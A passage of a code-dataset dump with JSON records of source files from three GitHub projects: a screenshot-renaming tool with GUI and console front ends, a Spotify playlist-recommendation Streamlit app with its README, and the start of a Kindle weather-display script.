PickStuNumber(\"./pics/IMG.jpg\", show_img=True).print_info()\n # PickStuNumber(\"./pics/IMG_023.jpg\", show_img=True).print_info()\n # PickStuNumber(\"./pics/F6D35171-ECCF-4D28-BFF5-69B31453A2FB_big.jpg\", show_img=True).write_out()\n pass\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.4365079402923584, "alphanum_fraction": 0.6746031641960144, "avg_line_length": 14.875, "blob_id": "99e84148e39e86f40e466f42d91f2b5408210896", "content_id": "bf93a372562dd9a15375c506ab2b5ba00699bf5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 126, "license_type": "no_license", "max_line_length": 23, "num_lines": 8, "path": "/requirements.txt", "repo_name": "TurnA-Lab/auto-rename-pic", "src_encoding": "UTF-8", "text": "cnstd==0.1.1\ntqdm==4.54.1\ncnocr==1.2.2\nclick==7.1.1\nnumpy==1.18.1\nbeeprint==2.4.10\nopencv_python==4.2.0.32\nPySimpleGUI==4.32.1" }, { "alpha_fraction": 0.42823687195777893, "alphanum_fraction": 0.4404483139514923, "avg_line_length": 32.774009704589844, "blob_id": "a7dbc6857fec330903aaa55ecc2bef42c869bbd0", "content_id": "eaaf403e4c11f4a69b753e669679ceb66c5475aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6352, "license_type": "no_license", "max_line_length": 118, "num_lines": 177, "path": "/desktop.py", "repo_name": "TurnA-Lab/auto-rename-pic", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = 'iskye'\n\nimport ctypes\nimport platform\nimport subprocess\n\nimport PySimpleGUI as sg\n\nfrom pick_stu_number import PickStuNumber\n\n\ndef exe_cmd_subprocess(command, *args):\n try:\n sp = subprocess.Popen([command, *args], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = sp.communicate()\n if out:\n print(out.decode(\"utf-8\"))\n if err:\n print(err.decode(\"utf-8\"))\n except Exception:\n pass\n\n\ndef make_dpi_aware():\n \"\"\"\n 高清分辨率\n 来源:https://github.com/PySimpleGUI/PySimpleGUI/issues/1179#issuecomment-475899050\n \"\"\"\n if int(platform.release()) >= 8:\n ctypes.windll.shcore.SetProcessDpiAwareness(True)\n\n\ndef main():\n make_dpi_aware()\n\n # 设置主题\n sg.theme('Light Grey 4')\n\n # 图片文件夹路径\n img_folder = {\n 'key': '-ImgFolder-',\n 'default': '.'\n }\n # 是否显示图片\n show_img = {\n 'key': '-ShowImg-',\n 'keyT': '-ShowImgT-',\n 'keyF': '-ShowImgF-',\n 'default': False\n }\n # 输出路径\n output = {\n 'key': '-Output-',\n 'default': '.'\n }\n # 合规且不重复\n output_suc = {\n 'key': '-OutputSuc-',\n 'default': 'output_suc'\n }\n # 合规但是重复\n output_dup = {\n 'key': '-OutputDup-',\n 'default': 'output_dup'\n }\n # 不合规\n output_fail = {\n 'key': '-OutputFail-',\n 'default': 'output_fail'\n }\n\n # 开始执行\n basic = [[sg.Text('请选择图片所在文件夹路径')],\n [sg.Input(sg.user_settings_get_entry(img_folder.get('key'),\n img_folder.get('default')),\n key=img_folder.get('key'), size=(25, 1)),\n sg.FolderBrowse(button_text='浏览')],\n [sg.OK(button_text='立即开始')],\n [sg.Output(size=(30, 10))]]\n\n # 配置\n config = [[sg.Frame(title='处理配置',\n layout=\n [[sg.Column(\n size=(320, 60),\n layout=\n [[sg.Text('显示处理图片过程', size=(18, 1)),\n sg.Radio('是', 'show_img',\n default=sg.user_settings_get_entry(\n show_img.get('key'), show_img.get('default')) is True,\n key=show_img.get('key')),\n sg.Radio('否', 'show_img',\n default=sg.user_settings_get_entry(\n show_img.get('key'), show_img.get('default')) is False)]]\n )]])\n ],\n [sg.Frame(title='输出配置',\n layout=\n [[sg.Column(\n size=(320, 160),\n layout=\n [[sg.Text('输出路径', size=(18, 1)),\n sg.Input(sg.user_settings_get_entry(output.get('key'), output.get('default')),\n key=output.get('key'), size=(6, 1)),\n sg.FolderBrowse(button_text='浏览')],\n [sg.Text('合规图片文件夹名', size=(18, 1)),\n sg.Input(sg.user_settings_get_entry(output_suc.get('key'), output_suc.get('default')),\n key=output_suc.get('key'), size=(15, 1))],\n [sg.Text('重复图片文件夹名', size=(18, 1)),\n sg.Input(sg.user_settings_get_entry(output_dup.get('key'), output_dup.get('default')),\n key=output_dup.get('key'), size=(15, 1))],\n [sg.Text('其它图片文件夹名', size=(18, 1)),\n sg.Input(sg.user_settings_get_entry(output_fail.get('key'), output_fail.get('default')),\n key=output_fail.get('key'), size=(15, 1))]]\n )]])\n ],\n [sg.OK(button_text='保存')]]\n\n # 选项卡\n layout = [[sg.TabGroup(layout=[[sg.Tab('开始', basic), sg.Tab('配置', config)]])]]\n\n # 显示的窗口\n window = sg.Window(title='青年大学习截图重命名',\n margins=(30, 30),\n font=('Microsoft YaHei', 10),\n finalize=True,\n layout=layout).finalize()\n\n # 处理事件\n while True:\n event, values = window.read()\n\n # print(event, values)\n if event == sg.WIN_CLOSED:\n break\n elif event == '立即开始':\n # 禁用关闭\n window.DisableClose = True\n\n print('即将开始处理图片')\n print('请在处理完毕后再关闭本窗口\\n')\n print('-' * 30)\n\n PickStuNumber(\n values.get(img_folder.get('key')),\n sg.user_settings_get_entry(show_img.get('key'), show_img.get('default'))) \\\n .write_out(\n sg.user_settings_get_entry(output.get('key'), output.get('default')),\n sg.user_settings_get_entry(output_suc.get('key'), output_suc.get('default')),\n sg.user_settings_get_entry(output_dup.get('key'), output_dup.get('default')),\n sg.user_settings_get_entry(output_fail.get('key'), output_fail.get('default')))\n\n print()\n print('处理完毕')\n print('-' * 30)\n\n # 启用关闭\n window.DisableClose = False\n\n elif event == '保存':\n for key in {img_folder.get('key'), show_img.get('keyT'), output.get('key'),\n output_suc.get('key'), output_dup.get('key'), output_fail.get('key')}:\n if key is show_img.get('keyT'):\n sg.user_settings_set_entry(show_img.get('key'), values.get(show_img.get('key')))\n else:\n sg.user_settings_set_entry(key, values.get(key))\n\n # 关闭窗口\n window.close()\n pass\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.6326942443847656, "alphanum_fraction": 0.6347123980522156, "avg_line_length": 27.314285278320312, "blob_id": "72f3f255c5af8e3a7a28232e1b65d5f2c3eb8eb8", "content_id": "98854e2fff9e9281d47c2f0087356dc1aeb8dc84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1191, "license_type": "no_license", "max_line_length": 94, "num_lines": 35, "path": "/console.py", "repo_name": "TurnA-Lab/auto-rename-pic", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = 'iskye'\n\nimport click\n\nfrom pick_stu_number import PickStuNumber\n\n\[email protected]()\[email protected]('--path', default='.', help='图片或者图片所在文件夹的路径')\[email protected]('--show-img', default=False, help='是否展示处理图片过程')\[email protected]('--show-info', default=False, help='是否展示处理图片结果')\[email protected]('--output', default='.', help='图片输出到的文件夹路径')\[email protected]('--output-suc', default='output_suc', help='合规且不重复图片所在的文件夹名')\[email protected]('--output-dup', default='output_dup', help='合规但是重复图片所在的文件夹名')\[email protected]('--output-fail', default='output_fail', help='其它图片所在的文件夹名')\[email protected]_option(help='显示帮助')\ndef main(path,\n show_img,\n show_info,\n output,\n output_suc,\n output_dup,\n output_fail):\n \"\"\"自动重命名图片为学号\"\"\"\n psn = PickStuNumber(path, show_img).write_out(output, output_suc, output_dup, output_fail)\n if show_info:\n psn.print_info()\n pass\n\n\nif __name__ == '__main__':\n main()\n" } ]
4
allisonjaye/playlist_continuation
https://github.com/allisonjaye/playlist_continuation
14bf080c8aaab60d7f3c6323100f2c647c2e9e5b
a7f49406226791a02be5a396e3ef1cf66d065c00
04828556da34ecafecca61313c62db7dd4fe53d7
refs/heads/main
2023-07-16T06:22:46.634021
2021-08-24T18:30:24
2021-08-24T18:30:24
394,505,991
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6696428656578064, "alphanum_fraction": 0.7946428656578064, "avg_line_length": 21.399999618530273, "blob_id": "6f097c6300fe60da44a73b73d7600b1477a4ccaa", "content_id": "379a4c86412b9eb407bc97042a24bc88990e56ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 112, "license_type": "no_license", "max_line_length": 34, "num_lines": 5, "path": "/website/.streamlit/config.toml", "repo_name": "allisonjaye/playlist_continuation", "src_encoding": "UTF-8", "text": "[theme]\nprimaryColor=\"#1db954\"\nbackgroundColor=\"#191414\"\nsecondaryBackgroundColor=\"#1db954\"\ntextColor=\"#ffffff\"\n" }, { "alpha_fraction": 0.5325708389282227, "alphanum_fraction": 0.5589259266853333, "avg_line_length": 21.322221755981445, "blob_id": "da5fbd2f2bd8220b53d0532df54534d0fcbd9617", "content_id": "2b66d906633d44bab9cecf33e1183c76fdb92b5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2012, "license_type": "no_license", "max_line_length": 68, "num_lines": 90, "path": "/EDA_README.md", "repo_name": "allisonjaye/playlist_continuation", "src_encoding": "UTF-8", "text": "first 10000 playlists\n\n tracks:\n 664712 total tracks\n 170089 unique track ids\n 132920 unique track names\n top tracks with artist:\n HUMBLE. by Kendrick Lamar\n Closer by The Chainsmokers\n One Dance by Drake\n Broccoli (feat. Lil Yachty) by DRAM\n Congratulations by Post Malone\n Caroline by Aminé\n Bad and Boujee (feat. Lil Uzi Vert) by Migos\n iSpy (feat. Lil Yachty) by KYLE\n XO TOUR Llif3 by Lil Uzi Vert\n No Problem (feat. Lil Wayne & 2 Chainz) by Chance The Rapper\n Home by multiple artists\n top track names:\n Closer\n Home\n HUMBLE.\n Roses\n One Dance\n Ride\n Congratulations\n Let Me Love You\n Broccoli (feat. Lil Yachty)\n Caroline\n\n artists:\n 35637 unique artists\n top artists:\n Drake\n Kanye West\n Kendrick Lamar\n Rihanna\n The Weeknd\n Ed Sheeran\n Future\n Eminem\n The Chainsmokers\n J. Cole\n\n albums:\n 69059 unique albums\n 81565 unique album ids\n top albums with artist:\n Views by Drake\n Stoney by Post Malone\n More Life by Drake\n DAMN. byt Kendrick Lamar\n Coloring Book by Chance the Rapper\n Beauty Behind the Madness by The Weeknd\n Culture by Migos\n American Teen by Khalid\n Blurryface by Twenty One Pilots\n Purpose by Justin Bieber\n top album names:\n Views\n Stoney\n Greatest Hits\n More Life\n DAMN.\n Coloring Book\n Beauty Behind the Madness\n Culture\n American Teen \n Purpose\n\n playlists:\n 5954 unique titles\n 5-250 songs in playlist\n 66.5 avg songs in playlist\n top playlist titles:\n Country/country\n Chill/chill\n Rock\n Rap/rap\n Workout/workout\n oldies/Oldies\n Party\n Worship\n Christmas\n jams\n Classic Rock\n EDM\n Music\n Disney\n 80s\n\n\n" }, { "alpha_fraction": 0.5984792709350586, "alphanum_fraction": 0.6333088278770447, "avg_line_length": 55.375, "blob_id": "59720c78297ef08dbeb0dc4e2c3aa444c8bb0c62", "content_id": "2c351ea5644dc301759b65823dbcdfb0d5121fd4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4077, "license_type": "no_license", "max_line_length": 131, "num_lines": 72, "path": "/website/knn.py", "repo_name": "allisonjaye/playlist_continuation", "src_encoding": "UTF-8", "text": "import streamlit as st\nimport streamlit.components.v1 as components\nimport numpy as np\nimport pandas as pd\nfrom sklearn.neighbors import NearestNeighbors\nfrom scipy.sparse import load_npz\nfrom collections import Counter\nimport pickle\n\ndata = pd.read_pickle('website/data.pkl')\n\nst.title(\"Please Don't Stop The Music:\")\nst.header(\"A Playist Continuation Program\")\nwith st.form(key='my form'):\n random_playlists = ['Throwbacks', 'Country jams', 'Classic Rock', 'Christmas', 'Disney']\n p_name = st.selectbox('Choose a Playlist', (random_playlists))\n playlist_index = data[data.playlist_name == p_name][\"pid\"].values[0]\n col1, col2 = st.columns(2)\n submitted1 = col1.form_submit_button(\"Check it Out\")\n col1.header(\"Original Playlist\")\n submitted2 = col2.form_submit_button(\"Recommend Songs\")\n col2.header(\"Recommendations\")\n\n if submitted1:\n with col1:\n play_tracks = data[data.pid == playlist_index]['trackid'].sample(5, random_state=1).tolist()\n track1, track2, track3, track4, track5 = play_tracks\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track1}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track2}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track3}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track4}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track5}\", height=80, width=300))\n\n\n if submitted2:\n with col1:\n play_tracks = data[data.pid == playlist_index]['trackid'].sample(5, random_state=1).tolist()\n track1, track2, track3, track4, track5 = play_tracks\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track1}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track2}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track3}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track4}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track5}\", height=80, width=300))\n with col2:\n data2 = pd.read_pickle('website/data2.pkl')\n sparse = load_npz('website/sparse2.npz')\n model_knn = NearestNeighbors(metric='cosine', algorithm='brute', n_neighbors=20, n_jobs=-1)\n\n model_knn.fit(sparse)\n distances, indices = model_knn.kneighbors(sparse[playlist_index], n_neighbors=50)\n raw_recommends = sorted(list(zip(indices.squeeze().tolist(), distances.squeeze().tolist())), key=lambda x: x[1])[:0:-1]\n dif_songs = []\n for (idx, dist) in raw_recommends:\n dif = sparse[idx] - sparse[playlist_index]\n dif[dif<0] = 0\n dif_indicies = dif.nonzero()\n dif_songs.append(dif_indicies[1])\n total = np.hstack(dif_songs)\n common = Counter(total).most_common(5)\n song_indicies_list = []\n for row in common:\n song_indicies_list.append(row[0])\n track_uri = []\n for idx in song_indicies_list:\n track_uri.append(data2.index[idx])\n song1, song2, song3, song4, song5 = track_uri\n \n print(components.iframe(f\"https://open.spotify.com/embed/track/{song1}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{song2}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{song3}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{song4}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{song5}\", height=80, width=300))\n \n \n" }, { "alpha_fraction": 0.5542168617248535, "alphanum_fraction": 0.7228915691375732, "avg_line_length": 12.833333015441895, "blob_id": "e13ab4a622c098de4e05d27d5d2d3372947b41d4", "content_id": "30df1eb3636f333a4f57f9097e749b906f14ab11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 83, "license_type": "no_license", "max_line_length": 17, "num_lines": 6, "path": "/website/requirements.txt", "repo_name": "allisonjaye/playlist_continuation", "src_encoding": "UTF-8", "text": "numpy==1.20.1\nstreamlit==0.87.0\nmatplotlib==3.4.1\npandas==1.2.3\nscikit-learn\nscipy\n" }, { "alpha_fraction": 0.5953627228736877, "alphanum_fraction": 0.6295188069343567, "avg_line_length": 54.45833206176758, "blob_id": "3fc0e422bfa87da297b2379a19981750691c538f", "content_id": "725e2f673253e19a7bf42d9826a1df8b4afea9af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4011, "license_type": "no_license", "max_line_length": 108, "num_lines": 72, "path": "/website/cossim.py", "repo_name": "allisonjaye/playlist_continuation", "src_encoding": "UTF-8", "text": "import streamlit as st\nimport streamlit.components.v1 as components\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom scipy.sparse import load_npz\nfrom collections import Counter\nimport pickle\n\ndata = pd.read_pickle('data.pkl')\n\nst.title(\"Please Don't Stop The Music:\")\nst.header(\"A Playist Continuation Program\")\nwith st.form('my form'):\n random_playlists = ['Throwbacks', 'Country jams', 'Classic Rock', 'Christmas', 'Disney']\n p_name = st.selectbox('Choose a Playlist', (random_playlists))\n playlist_index = data[data.playlist_name == p_name][\"pid\"].values[0]\n col1, col2 = st.columns(2)\n submitted1 = col1.form_submit_button(\"Check it Out\")\n col1.header(\"Original Playlist\")\n submitted2 = col2.form_submit_button(\"Recommend Songs\")\n col2.header(\"Recommendations\")\n\n if submitted1:\n with col1:\n play_tracks = data[data.pid == playlist_index]['trackid'].sample(5, random_state=1).tolist()\n track1, track2, track3, track4, track5 = play_tracks\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track1}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track2}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track3}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track4}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track5}\", height=80, width=300))\n\n\n if submitted2:\n with col1:\n play_tracks = data[data.pid == playlist_index]['trackid'].sample(5, random_state=1).tolist()\n track1, track2, track3, track4, track5 = play_tracks\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track1}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track2}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track3}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track4}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{track5}\", height=80, width=300))\n with col2:\n with open(\"pivot_columns.txt\", \"rb\") as fp:\n pivot = pickle.load(fp)\n sparse = load_npz('sparse.npz')\n\n cos_sim = cosine_similarity(sparse)\n sim_playlists = list(enumerate(cos_sim[playlist_index]))\n sorted_similar_playlists = sorted(sim_playlists,key=lambda x:x[1],reverse=True)[1:]\n dif_songs = []\n for row in sorted_similar_playlists[:500]:\n dif = sparse[row[0]] - sparse[playlist_index]\n dif[dif==-1] = 0\n dif_indicies = dif.nonzero()\n dif_songs.append(dif_indicies[1])\n total = np.hstack(dif_songs)\n common = Counter(total).most_common(5)\n song_indicies_list = []\n for row in common:\n song_indicies_list.append(row[0])\n track_uri = []\n for index in song_indicies_list:\n track_uri.append(data[data['track_name'] == pivot[index]]['trackid'].iloc[0])\n song1, song2, song3, song4, song5 = track_uri\n \n print(components.iframe(f\"https://open.spotify.com/embed/track/{song1}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{song2}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{song3}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{song4}\", height=80, width=300))\n print(components.iframe(f\"https://open.spotify.com/embed/track/{song5}\", height=80, width=300))\n \n \n" }, { "alpha_fraction": 0.7469649314880371, "alphanum_fraction": 0.7611512541770935, "avg_line_length": 81.37078857421875, "blob_id": "a60bea85485b54c56f079f39d807fa83522211bb", "content_id": "843c07f54577640230d2052e4b88ac2d69e70f42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7337, "license_type": "no_license", "max_line_length": 716, "num_lines": 89, "path": "/README.md", "repo_name": "allisonjaye/playlist_continuation", "src_encoding": "UTF-8", "text": "# Please Don't Stop the Music: A Playlist Continuation Program\n<div align=\"center\"><img src=\"https://github.com/allisonjaye/playlist_continuation/blob/main/images/397-3976701_spotify-logo-green-png.jpeg\" width=\"275\" height=\"100\">\n \n<div align=\"left\">\n\n## Table of contents\n- [Introduction](#introduction)\n - [Overview](#overview)\n - [Motivation](#motivation)\n- [Exploratory Data Analysis](#exploratory-data-analysis)\n - [Data Descriptions](#data-descriptions)\n - [Visualizations](#visualizations)\n- [Models](#models)\n - [Baseline Model](#baseline-model)\n - [Collaborative Filtering](#collaborative-filtering)\n- [Results](#results)\n - [Recommendation Web App](#recommendation-web-app)\n- [Next Steps](#next-steps)\n## Introduction\n### Overview\nThis program is designed to automatically continue a user's playlist on any music platform - here, Spotify. When used, it will help users find new music they enjoy as well as keep them using the platform longer. My steps for completing this program start with exploring and learning about the data. Then I created a simple baseline model as a reference point for improvement. Using multiple different models, I predicted if a user would enjoy the songs enough to add them to their playlist. Finally, I implemented the best model into a web app to recommend songs from a random playlist.\n\n### Motivation\nOver the past decade, music streaming services have become increasingly popular, changing the way consumers interact with their audio content. Listeners are no longer bound to predetermined track listings on an album or record; rather, they are free to construct their own playlists as they see fit. As a result, the task of automatic playlist generation has become increasingly relevant to the streaming community. These services rely on intelligent systems in order enhance the playlist creation experience, analyzing user preferences and tastes to recommend new songs. This project seeks to test the power of these recommendation models – observing which techniques perform best in the playlist continuation task.\n\n## Exploratory Data Analysis\n### Data Descriptions\nThe data used in this program is from Spotify's Million Playlist Dataset. It is publically accessable [here](https://www.aicrowd.com/challenges/spotify-million-playlist-dataset-challenge/dataset_files). The file structure consists of 10,000 .json subfiles, with each subfile containing 1,000 playlists. Each playlist object contains the following attributes:\n\n- **'collaborative'**: boolean (describes whether or not it is a collaborative playlist)\n- **'duration_ms'**: int (the duration of the entire playlist in milliseconds)\n- **'modified_at'**: int (the Unix Epoch Time value of when the playlist was last modified)\n- **'name'**: str (name of the playlist)\n- **'num_albums'**: int (number of unique albums in the playlist)\n- **'num_artists'**: int (number of unique artists in the playlist)\n- **'num_edits'**: int (number of times the playlist has been edited)\n- **'num_followers'**: int (number of users that follow the playlist)\n- **'num_tracks'**: int (number of tracks on the playlist)\n- **'pid'**: int (the playlist ID number, ranging from 0 - 999,999,999)\n- **'tracks'**: list of track objects (contains a list of tracks, where each track is an object containing the following attributes:\n - {**'album_name'**: str (the name of the track’s album)\n - **'album_uri'**: str (the unique album ID -- uniform resource identifier)\n - **'artist_name'**: str (the name of the artist)\n - **'artist_uri'**: str (the unique artist ID -- uniform resource identifier)\n - **'duration_ms'**: int (the duration of the track in milliseconds)\n - **'pos'**: int (the track’s position in the playlist)\n - **'track_name'**: str (the name of the track)})\n\n### Visualizations\nTaking a look into the data, the songs that appeared most frequently in all of the playlists were mostly rap/hip-hop.\n \n<img src=\"https://github.com/allisonjaye/playlist_continuation/blob/main/images/pop_songs.jpg\" width=\"720\" height=\"432\">\n \nThe most popular song *titles* were very similar but not exactly the same due to some songs having the same title.\n \n<img src=\"https://github.com/allisonjaye/playlist_continuation/blob/main/images/pop_song_titles.jpg\" width=\"720\" height=\"432\">\n \nI found that the most popular playlist title was 'Country'.\n \n<img src=\"https://github.com/allisonjaye/playlist_continuation/blob/main/images/pop_playlist_titles.jpg\" width=\"720\" height=\"432\">\n \nThe most popular artists throughly the playlist corresponded highly with the most popular songs.\n \n<img src=\"https://github.com/allisonjaye/playlist_continuation/blob/main/images/pop_artists.jpg\" width=\"720\" height=\"432\">\n \nThe same with the most popular albumns.\n \n<img src=\"https://github.com/allisonjaye/playlist_continuation/blob/main/images/pop_albums.jpg\" width=\"720\" height=\"432\">\n \nMost popular album *titles* throughout the playlists also include 'Greatest Hits' because so many different artists have an album with this title.\n \n<img src=\"https://github.com/allisonjaye/playlist_continuation/blob/main/images/pop_album_titles.jpg\" width=\"720\" height=\"432\">\n\n## Models\n \n### Baseline Model\nTo start, I created a baseline model as a reference point for growth. This model recommended most popular songs as a continuation for any playlist. From exploring the data, it seemed that this would work well for playlists that were mostly rap/hip-hop based but not so well with any other genre. With most playlists being titled 'Country', this model would not work well very often.\n \n### Collaborative Filtering\nTo combat this, I added a collaborative filtering algorithm. I shifted the data into a sparse matrix with each playlist on one side and all of the songs on the other. If a song was on a playlist, it received a one and otherwise, it received a zero. I then used K-Nearest Neighbors to find similarities between each playlist based on values of song. From the top 500 most similar playlists, the algorithm compiles the most common songs not including the songs already on given playlist. These songs are then recommended to the user. \n \n## Results\n \n### Recommendation Web App\nUsing Streamlit, I was able to produce a functioning web application that allows the user a choice of sample playlists to get recommendations from. Try it for yourself [here](https://share.streamlit.io/allisonjaye/playlist_continuation/main/website/knn.py). This is a screenshot example from the 'Classic Rock' playlist.\n<img src=\"https://github.com/allisonjaye/playlist_continuation/blob/main/images/Screen%20Shot%202021-08-10%20at%2010.49.16%20PM.png\" width=\"905\" height=\"432\">\n\n## Next Steps\nI plan continue improving my program by tuning hyperparameters, testing more models, and including a matrix factorization technique like SVD or NMF. I will also develop the website's capabilities to allow users to imput their own playlists or even just songs that they enjoy. Using another dataset with meta data about each song, I will implement a hybrid recommender that not only finds similarities in the playlists, but in the songs themselves. Instead of using human opinion as a measurement of accuracy, I will create a testing method to be able to see how well each model is doing numerically.\n" } ]
6
zaharco17/astrobot
https://github.com/zaharco17/astrobot
447fd168295d1f85fcef5d06ecf4cccb08a3b394
11e92b09be1b7193e7a9865f770c1f3dd3a64808
ca5eac4f9d7f537fe6845ee6feb8e17da581b5bd
refs/heads/main
2023-05-03T11:37:38.664743
2021-05-31T21:46:47
2021-05-31T21:46:47
370,751,540
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6967508792877197, "alphanum_fraction": 0.6967508792877197, "avg_line_length": 15.29411792755127, "blob_id": "d45ce75481af0258fba5026161a2dae80af3072d", "content_id": "70719b018ab21df1d72c56ff70d69d46dd51f7f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 277, "license_type": "no_license", "max_line_length": 73, "num_lines": 17, "path": "/planet.py", "repo_name": "zaharco17/astrobot", "src_encoding": "UTF-8", "text": "import ephem\nimport datetime\n\na = \"Mercury\"\n\ndef planet(a):\n Pl = getattr(ephem,a)(datetime.date.today())\n constellation = ephem.constellation(Pl)\n return constellation\n\nprint (planet(a))\n \n\n\n\n\nplanets = 'Mercury, Venus, Earth, Mars, Jupiter, Saturn, Uranus, Neptune'\n" }, { "alpha_fraction": 0.6979503631591797, "alphanum_fraction": 0.6990291476249695, "avg_line_length": 27.90625, "blob_id": "bba7b906eabbf1a174c5a9ae921828f5ad8dc56c", "content_id": "227b4b1ff94c7c110463b195eb61bd1c90cbc374", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1044, "license_type": "no_license", "max_line_length": 71, "num_lines": 32, "path": "/astrobot.py", "repo_name": "zaharco17/astrobot", "src_encoding": "UTF-8", "text": "\nimport logging # для записи отчета о работе бота, импортитруем logging\nfrom telegram import update \nfrom telegram.ext import Updater, CommandHandler\nimport settings\nimport ephem\nimport datetime\n\n# записывать будет все сообщения уровня INFO и выше в файл bot.log\nlogging.basicConfig(filename='bot.log', level=logging.INFO)\n\ndef greet_user(update, context):\n print('Вызван /planet')\n ans = update.message.text.split()\n pl = ans[1]\n \n update.message.reply_text(f'созвездие, {planet(pl)}') # пишет в чат\n\ndef planet(pl):\n A = getattr(ephem,pl)(datetime.date.today()) \n constellation = ephem.constellation(A)\n return constellation \n\ndef main():\n mybot = Updater(settings.API_KEY, use_context=True) \n dp = mybot.dispatcher \n dp.add_handler(CommandHandler(\"planet\", greet_user))\n logging.info(\"Бот стартовал\") \n mybot.start_polling()\n mybot.idle()\n\nif __name__ == \"__main__\":\n main()\n\n" } ]
2
badboy/kindle-weather-display
https://github.com/badboy/kindle-weather-display
86af4ce015d400390caacacc59219298166baccd
78ffceb0357b5484f578fc1cdc3edad88a5dc118
92bd455d459e82f6904eec035df4282d4a2bade4
refs/heads/master
2020-05-29T11:36:38.213451
2015-05-16T09:29:56
2015-05-16T09:29:56
35,511,223
9
3
null
2015-05-12T20:34:01
2015-05-12T20:33:10
2014-09-04T02:12:54
null
[ { "alpha_fraction": 0.6300366520881653, "alphanum_fraction": 0.6531135439872742, "avg_line_length": 27.736841201782227, "blob_id": "f6a7c9eedb214a30cd7378041422dcc259fd1012", "content_id": "abae59e87b871e4901790c925184848961d4aa7f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2730, "license_type": "permissive", "max_line_length": 154, "num_lines": 95, "path": "/server/weather-script.py", "repo_name": "badboy/kindle-weather-display", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2\n# coding=utf-8\n\n# Kindle Weather Display\n# Matthew Petroff (http://mpetroff.net/)\n# September 2012\n\nimport json\nimport datetime\nimport codecs\ntry:\n # Python 3\n from urllib.request import urlopen\nexcept ImportError:\n # Python 2\n from urllib2 import urlopen\n\n#\n# Geographic location\n#\n\ncity = 'Aachen'\n\n#\n# Download and parse weather data\n#\n\nurl = 'http://api.openweathermap.org/data/2.5/forecast/daily?q=' + city + '&mode=json&units=metric&cnt=4'\n\n# Fetch data (change lat and lon to desired location)\nweather_json = urlopen(url).read()\ndata = json.loads(weather_json)\n\nicon_mappings = {\n '01d': 'skc', # Clear, sky is clear\n '02d': 'few',\n '03d': 'sct',\n '04d': 'ovc',\n '09d': 'ra',\n '10d': 'hi_shwrs', # Rain, light rain\n '11d': 'tsra',\n '13d': 'sn',\n '50d': 'fg',\n}\n\nhighs = []\nlows = []\nicons = []\nfor day in data['list']:\n hi = int(round(float(day['temp']['max'])))\n lo = int(round(float(day['temp']['min'])))\n highs.append(hi)\n lows.append(lo)\n icons.append(icon_mappings[day['weather'][0]['icon']])\n\n## Parse icons\n#xml_icons = dom.getElementsByTagName('icon-link')\n#icons = [None]*4\n#for i in range(len(xml_icons)):\n# icons[i] = xml_icons[i].firstChild.nodeValue.split('/')[-1].split('.')[0].rstrip('0123456789')\n\n# Parse dates\nday_one = datetime.datetime.fromtimestamp(data['list'][0]['dt'])\ntoday = datetime.datetime.now()\n\n#print(day_one)\n#print(highs)\n#print(lows)\n#print(icons)\n\none_day = datetime.timedelta(days=1)\ndays_of_week = ['Monday', 